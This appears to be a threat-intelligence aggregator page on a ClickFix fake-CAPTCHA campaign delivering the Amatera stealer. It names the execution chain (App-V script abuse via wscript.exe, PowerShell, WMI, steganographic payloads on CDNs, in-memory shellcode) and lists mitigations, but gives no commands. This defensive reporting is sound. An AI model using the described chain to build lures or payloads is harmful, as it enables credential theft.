Find notable cyber news and cases, enriched with sources, timelines, and signals.
Home Browse News Feed Stats Watchlists Beta About Contact

ClickFix fake CAPTCHA campaign delivering Amatera

Campaign
First reported
Last updated
Happening score
H score 39
2 unique sources, 2 articles

Summary

Hide ▲

A ClickFix campaign now uses a fake CAPTCHA and a signed Microsoft App-V script to deliver Amatera to Windows victims, raising the risk of credential theft and follow-on compromise. The operation abuses trusted system components to disguise malicious execution. It also layers PowerShell, WMI, and in-memory loading to reduce detection.

Related Happenings

ACSC ClickFix mitigation guidance for Vidar Stealer

Advisory/Mitigation
First: 07.05.2026 21:00 Last: 07.05.2026 21:00 Sources 1

About this happening: The **ACSC** issued mitigation guidance for an **ongoing ClickFix campaign** that is pushing **Vidar Stealer** through **malicious PowerShell commands**, increasing credential-the...

Open Happening

Windows Shell spoofing flaw actively exploited (CVE-2026-32202)

Vulnerability
First: 28.04.2026 08:50 Last: 28.04.2026 08:50 Sources 1

About this happening: **Microsoft** updated **Windows Shell** advisory guidance to confirm **CVE-2026-32202** was **actively exploited in the wild**, raising the risk of sensitive-information disclosur...

Open Happening

DeepLoad credential-stealing malware activity with WMI persistence

Malware Activity
First: 31.03.2026 00:25 Last: 31.03.2026 00:25 Sources 1

About this happening: The **DeepLoad** malware strain is stealing credentials immediately after infection, exposing **stored browser passwords**, **live keystrokes**, and **active accounts** in **enter...

Open Happening

DeepLoad ClickFix loader with browser-credential theft and WMI reinfection

Malware Activity
First: 30.03.2026 18:47 Last: 30.03.2026 18:47 Sources 1

About this happening: The **DeepLoad** malware loader now uses **ClickFix** delivery to compromise Windows hosts, raising the risk of credential theft and reinfection. It abuses **mshta.exe**, obfuscat...

Open Happening

DeepLoad malware uses ClickFix, AI obfuscation, and WMI persistence

Malware Activity
First: 30.03.2026 15:00 Last: 30.03.2026 15:00 Sources 1

About this happening: The **DeepLoad** malware family is actively using **ClickFix** lures and **AI-generated obfuscation** to steal **enterprise credentials** from **Windows** systems, increasing the...

Open Happening

Timeline

  1. 26.01.2026 23:42 2 articles · 4mo ago

    BlackPoint Cyber discloses ClickFix-Amatera campaign

    Initial Disclosure

    BlackPoint Cyber describes a new ClickFix-style campaign that starts with a fake CAPTCHA in the Windows Run dialog, abuses the signed App-V script SyncAppvPublishingServer.vbs through wscript.exe to launch PowerShell, and stages Amatera delivery with WMI, public Google Calendar configuration, PNG steganography on public CDNs, and in-memory shellcode execution. The same reporting also notes that Amatera can collect browser data and credentials and recommends restricting Run dialog access, removing unused App-V components, enabling PowerShell logging, and monitoring outbound connections for host-header or TLS SNI mismatches.

    Show sources
    Open in new tab